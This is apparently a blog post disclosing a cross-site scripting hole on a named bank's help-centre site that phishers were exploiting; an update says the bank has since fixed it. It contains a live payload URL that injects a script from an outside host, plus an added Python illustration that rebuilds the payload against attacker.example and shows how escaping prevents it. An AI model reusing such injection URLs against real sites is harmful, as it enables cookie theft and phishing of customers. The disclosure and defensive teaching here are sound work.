OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you cannot trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL in your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I have shown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.
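To make the mechanism concrete, here is an added illustration (not SunTrust's code, and not the demo script from the post): a stand-in help page that echoes the TOPNAME query parameter into a link, shown both with the raw interpolation that lets the crafted value close the tag and start a script element, and with HTML-escaping that neutralises it. The hostnames and the `/topic?name=` link shape are constructed for the example.

```python
"""Reflected XSS through an unescaped query parameter, and the fix."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the link in the post: the value of TOPNAME decodes to
#   "></a><script src="https://attacker.example/xssdemo.js
# which ends the attribute, closes the anchor and opens a script tag.
DEMO_URL = (
    "http://helpcenter.example/doc/sn6400.xml?SID=586&TOPNAME="
    "%22%3E%3C/a%3E%3Cscript%20src=%22https://attacker.example/xssdemo.js"
)


def topname_from_url(url: str) -> str:
    """Return the decoded TOPNAME parameter as the server would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("TOPNAME", [""])[0]


def render_vulnerable(topname: str) -> str:
    """Weak rendering: the parameter is pasted straight into the markup.

    A double quote in the value terminates the href attribute, '>' ends the
    tag, and everything after it is parsed as new HTML on the trusted origin.
    """
    return f'<a href="/topic?name={topname}">{topname}</a>'


def render_hardened(topname: str) -> str:
    """Fixed rendering: entity-encode the value before it touches the page.

    escape(..., quote=True) rewrites & < > " ' as entities, so the value can
    neither terminate the attribute nor introduce a new element.
    """
    safe = escape(topname, quote=True)
    return f'<a href="/topic?name={safe}">{safe}</a>'


def injects_markup(html_out: str) -> bool:
    """Detection check on rendered output: did the reflected value add a
    script element or close the anchor early? Case-insensitive."""
    lower = html_out.lower()
    return "<script" in lower or lower.count("</a>") > 1


if __name__ == "__main__":
    value = topname_from_url(DEMO_URL)
    print("vulnerable injects markup:", injects_markup(render_vulnerable(value)))
    print("hardened injects markup:  ", injects_markup(render_hardened(value)))
```

The same escaping rule applies to every place a request value is reflected, not just this one attribute; an href additionally deserves URL-encoding of the value, which this stand-in omits for brevity.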

Technical details under the cut